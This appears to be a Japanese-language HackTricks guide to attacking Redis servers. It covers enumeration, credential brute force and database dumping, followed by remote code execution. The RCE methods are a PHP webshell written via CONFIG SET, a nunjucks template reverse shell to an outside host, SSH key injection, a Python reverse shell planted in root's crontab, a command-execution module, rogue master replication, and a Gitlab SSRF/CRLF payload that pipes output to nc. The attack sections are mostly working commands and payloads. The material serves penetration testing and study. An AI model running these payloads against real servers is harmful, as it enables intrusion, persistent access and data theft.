21 KiB
6379 - Pentesting Redis
AWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォロー**してください。
- ハッキングトリックを共有するには、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
HackenProof Discordサーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルと挑戦に深く入り込むコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、迅速なハッキングワールドの最新情報を把握しましょう
最新のアナウンス
最新のバグバウンティの開始や重要なプラットフォームのアップデートに関する情報を入手しましょう
Discordに参加して、今日からトップハッカーと協力を始めましょう!
基本情報
ドキュメントによると、Redisはオープンソース(BSDライセンス)、インメモリデータ構造ストアとして使用されるデータベース、キャッシュ、メッセージブローカーです。
デフォルトでは、Redisはプレーンテキストベースのプロトコルを使用しますが、ssl/tlsも実装できることに注意する必要があります。ここでRedisをssl/tlsで実行する方法を学びます。
デフォルトポート: 6379
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.9
自動列挙
いくつかの自動化ツールが、Redisインスタンスから情報を取得するのに役立ちます:
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
手動列挙
バナー
Redisはテキストベースのプロトコルです。ソケットにコマンドを送信するだけで、返される値は読み取れます。また、Redisはssl/tlsを使用して実行することもできます(しかし、これは非常に珍しいです)。
通常のRedisインスタンスでは、nc
を使用して接続するか、redis-cli
を使用することもできます:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
最初に試すべきコマンドは**info
**です。これはRedisインスタンスの情報を出力するか、以下のような情報が返される可能性があります:
-NOAUTH Authentication required.
Redis 認証
デフォルトでは、Redis には 資格情報がなくてもアクセス できます。ただし、パスワードのみ、またはユーザー名 + パスワード をサポートするように 構成 することができます。
requirepass
パラメータを使用して redis.conf ファイルに パスワードを設定 することが可能です。また、サービスが再起動するまで一時的に接続して実行することもできます: config set requirepass p@ss$12E45
。
また、redis.conf ファイル内の masteruser
パラメータで ユーザー名 を構成することもできます。
{% hint style="info" %}
パスワードのみが構成されている場合、使用されるユーザー名は "default" です。
また、Redis がパスワードのみかユーザー名 + パスワードで構成されているか 外部から確認する方法はありません。
{% endhint %}
このようなケースでは、Redis とやり取りするために 有効な資格情報を見つける必要があります。それを試すために ブルートフォース を試すことができます。
有効な資格情報を見つけた場合は、接続を確立した後にセッションを認証する必要があります。
AUTH <username> <password>
有効な資格情報 は次のように応答されます: +OK
認証済み列挙
Redisサーバーが匿名接続を許可している場合、または有効な資格情報を取得している場合、以下のコマンドを使用してサービスの列挙プロセスを開始できます:
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
その他のRedisコマンドはこちらとこちらで見つけることができます。
RedisインスタンスのRedisコマンドは、_redis.conf_ファイルで名前を変更したり削除したりすることができます。例えば、次の行はFLUSHDBコマンドを削除します:
rename-command FLUSHDB ""
よりセキュアにRedisサービスを設定する方法については、https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04 を参照してください。
また、実行されたRedisコマンドをリアルタイムで監視するには、monitor
コマンドを使用するか、トップ25の遅いクエリを取得するにはslowlog get 25
を使用できます。
さらに興味深い情報をRedisコマンドについては、https://lzone.de/cheat-sheet/Redis で見つけることができます。
データベースのダンプ
Redis内では、データベースは0から始まる番号です。 "Keyspace"チャンク内のinfo
コマンドの出力で使用されているかどうかを見つけることができます:
または、すべてのキースペース(データベース)を取得することもできます:
INFO keyspace
その例では、データベース0と1が使用されています。データベース0には4つのキーが含まれ、データベース1には1つのキーが含まれています。Redisはデフォルトでデータベース0を使用します。たとえばデータベース1をダンプするには、次のようにします:
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]
もしGET <KEY>
を実行する際に-WRONGTYPE Operation against a key holding the wrong kind of value
というエラーが表示された場合、キーが文字列や整数以外のものであり、それを表示するためには特別な演算子が必要となる可能性があります。
キーのタイプを知るには、TYPE
コマンドを使用します。以下はリストとハッシュキーの例です。
TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]
# If the type used is weird you can always do:
DUMP <key>
npmを使用してデータベースをダンプする redis-dump またはPython redis-utils
HackenProof Discord サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルとチャレンジに深く関わるコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界の最新情報を把握しましょう
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握しましょう
Discord に参加して、今日からトップハッカーと協力を始めましょう!
Redis RCE
インタラクティブシェル
redis-rogue-server はRedis(<=5.0.5)で自動的にインタラクティブシェルまたはリバースシェルを取得できます。
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>
PHP Webshell
情報はこちらから。Webサイトフォルダのパスを知っている必要があります:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK
Webshellアクセス例外がある場合は、バックアップを取った後にデータベースを空にしてから再度試すことができます。データベースを復元することを忘れないでください。
テンプレートWebshell
前のセクションと同様に、テンプレートエンジンによって解釈されるいくつかのHTMLテンプレートファイルを上書きしてシェルを取得することもできます。
たとえば、この解説に従って、攻撃者がnunjucksテンプレートエンジンによって解釈されるhtmlにrevシェルを注入したことがわかります。
{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}
{% hint style="warning" %} 複数のテンプレートエンジンがテンプレートをメモリにキャッシュするため、それらを上書きしても新しいものは実行されません。この場合、開発者が自動リロードを有効にしたままにしているか、サービスにDoSを実行する必要があります(そしてそれが自動的に再起動されることを期待する必要があります)。 {% endhint %}
SSH
例 こちらから
config get dir
の結果は他の手動の攻撃コマンドの後に変更される可能性があることに注意してください。Redisにログインした直後にこれを実行することをお勧めします。config get dir
の出力には、redisユーザーのホーム(通常は /var/lib/redis または /home/redis/.ssh)が見つかります。これを知ることで、authenticated_users
ファイルを書き込んで redisユーザー経由でsshアクセスできる場所がわかります。書き込み権限を持つ他の有効なユーザーのホームを知っている場合は、それも悪用できます:
- PCでssh公開鍵と秘密鍵のペアを生成します:
ssh-keygen -t rsa
- 公開鍵をファイルに書き込みます:
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
- ファイルをRedisにインポートします:
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
- Redisサーバーの authorized_keys ファイルに公開鍵を保存します:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
- 最後に、プライベートキーを使用して redisサーバー にssh接続できます:ssh -i id_rsa redis@10.85.0.52
このテクニックはこちらで自動化されています: https://github.com/Avinash-acid/Redis-Server-Exploit
Crontab
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
最後の例はUbuntu向けですが、Centos向けには次のコマンドを使用する必要があります:redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
この方法はビットコインを稼ぐためにも使用できます:yam
Redisモジュールの読み込み
- https://github.com/n0b0dyCN/RedisModules-ExecuteCommandの指示に従って、任意のコマンドを実行するRedisモジュールをコンパイルできます。
- 次に、コンパイルされたモジュールをアップロードする方法が必要です。
- ランタイムでアップロードしたモジュールを読み込みます:
MODULE LOAD /path/to/mymodule.so
- 正しく読み込まれたかを確認するために読み込まれたモジュールのリストを表示します:
MODULE LIST
- コマンドを実行します:
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
- 必要に応じてモジュールをアンロードします:
MODULE UNLOAD mymodule
LUAサンドボックス回避
こちらで、RedisはLuaコードをサンドボックス化して実行するためにEVALコマンドを使用していることがわかります。リンク先の投稿では、dofile関数を使用してこれを悪用する方法が示されていますが、おそらくこれはもはや可能ではありません。とにかく、Luaサンドボックスをバイパスできれば、システム上で任意のコマンドを実行できます。また、同じ投稿からDoSを引き起こすためのいくつかのオプションも確認できます。
Luaサンドボックスから脱出するためのいくつかのCVE:
マスタースレーブモジュール
マスターレディスでは、すべての操作が自動的にスレーブレディスに同期されるため、脆弱性のあるレディスをスレーブレディスと見なし、自分自身が制御するマスターレディスに接続し、自分自身のレディスにコマンドを入力できます。
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
RedisへのSSRF
Redisにクリアテキストリクエストを送信できる場合、Redisと通信できます。Redisはリクエストを1行ずつ読み取り、理解できない行にはエラーを返すだけです。
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
したがって、ウェブサイトでSSRF vulnを見つけ、いくつかのヘッダー(おそらくCRLF vulnを使用)やPOSTパラメータを制御できる場合、Redisに任意のコマンドを送信できます。
例: Gitlab SSRF + CRLFからシェルへ
Gitlab11.4.7では、SSRF脆弱性とCRLFが発見されました。SSRF脆弱性は、新しいプロジェクトを作成する際のURLからプロジェクトをインポートする機能にあり、[0:0:0:0:0:ffff:127.0.0.1](これにより127.0.0.1にアクセスされます)の形式で任意のIPにアクセスできるようにし、CRLF vulnはURLに**%0D%0A**文字を追加することで悪用されました。
したがって、これらの脆弱性を悪用して、gitlabからキューを管理するRedisインスタンスに話しかけ、それらのキューを悪用してコード実行を取得することが可能でした。Redisキューの悪用ペイロードは次のとおりです:
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
そして、whoami
を実行し、出力をnc
を介して送信するために、SSRFとCRLFを悪用したURLエンコードリクエストは次のとおりです:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
何らかの理由で(情報提供元はhttps://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/で、この情報はそこから取得されました)、この攻撃は git
スキームではなく http
スキームで動作しませんでした。
HackenProof Discord サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルと挑戦に深く入り込むコンテンツに参加しましょう
リアルタイムのハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースについていきましょう
最新のアナウンスメント
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握しましょう
Discord に参加して、今日からトップハッカーと協力を始めましょう!